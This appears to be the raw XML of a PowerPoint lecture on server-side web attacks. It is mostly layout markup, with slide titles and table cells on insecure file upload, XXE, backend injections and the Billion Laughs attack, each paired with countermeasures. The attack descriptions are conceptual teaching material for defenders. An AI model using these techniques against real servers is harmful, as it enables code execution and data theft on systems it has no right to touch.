                  <a:pt x="133699" y="417369"/>
                  <a:pt x="189188" y="415990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138104" y="417826"/>
                  <a:pt x="95621" y="424389"/>
                  <a:pt x="94594" y="431755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115117" y="561201"/>
                  <a:pt x="91715" y="735015"/>
                  <a:pt x="94594" y="835574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="100679" y="842162"/>
                  <a:pt x="52034" y="847203"/>
                  <a:pt x="0" y="851339"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="00FF00"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="1016326206">
                  <a:prstGeom prst="rightBrace">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 8333"/>
                      <a:gd name="adj2" fmla="val 4886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20F731-1FBF-480D-90B2-A5A0802B7946}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7588469" y="2457731"/>
            <a:ext cx="44353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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>  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br>
              <a:rPr lang="de-AT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>file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showprofile.php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executed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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>interpreter</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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808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281769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4463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839773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9631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97206"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="57111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Insecure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File Upload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Upload a malicious file for execution of code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exploiting insufficient server-side restrictions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trust any metadata sent from the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name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Store it outside the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>webroot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 the real </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>mimetype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 max </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>filesize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16622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9AF4D2CD-CD4E-4D7A-A54C-507BB578B2BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070365" y="2296585"/>
            <a:ext cx="10198413" cy="20967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ok, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>there</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>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one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>special</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>filetype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>left</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>…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3972341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09F37A-27E9-4BD1-8CA2-65083E9F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71" y="1893174"/>
            <a:ext cx="4067845" cy="260787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2C9737-F714-4BA5-8EFA-7256F350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071" y="1893175"/>
            <a:ext cx="4647912" cy="26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616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57F056C-F162-4311-9271-30E4557D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0" y="594591"/>
            <a:ext cx="10877300" cy="5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719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83183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1928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773019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2708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784714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17885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364314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A05:2021-Security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61662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61454"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="5102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4601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XML External Entity (XXE)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 sensitive files, send HTTP requests to other systems or cause a DoS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abusing a feature of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8117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Disable the processing of external entities in the XML-parser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A05:2021-Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0" err="1"/>
                        <a:t>Misconfiguration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or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626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2D16BAF-1448-4321-AB02-8FF30EB9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" t="460"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3121642" y="31531"/>
            <a:ext cx="5948715" cy="68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3E285F-183B-432B-A0E8-C35C1FCA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54" y="392486"/>
            <a:ext cx="11225492" cy="59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1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3097</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Breitbild</PresentationFormat>
  <Paragraphs>509</Paragraphs>
  <Slides>86</Slides>
  <Notes>37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86</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="91" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Office</vt:lpstr>
      <vt:lpstr>Server-side Attacks</vt:lpstr>
      <vt:lpstr>Rough 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Prepared Statements example</vt:lpstr>
      <vt:lpstr>ORM example (Doctrine)</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Further exploitation</vt:lpstr>
      <vt:lpstr>Old but gold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Some more backend injections</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Characters for separation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Countermeasures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Countermeasures (excerpt)</vt:lpstr>
      <vt:lpstr>Remember request routing ???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Billion Laughs Attack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2022-03-18T21:29:12Z</dcterms:modified>
</cp:coreProperties>
</file>